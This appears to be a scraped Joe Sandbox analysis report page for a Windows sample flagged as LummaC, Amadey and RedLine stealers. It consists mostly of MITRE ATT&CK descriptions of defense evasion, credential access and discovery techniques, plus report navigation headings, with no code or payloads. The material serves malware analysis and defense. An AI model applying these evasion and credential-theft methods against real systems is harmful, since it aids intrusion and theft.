Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bUWKfj04aU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Uni400uni.exe_abcc73dc4be9eccf93f57939ad34e24e865bf25_72d372f9_edad4638-018d-4178-8ee1-0f05c5001308\Report.wer

Windows Analysis Report
bUWKfj04aU.exe

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre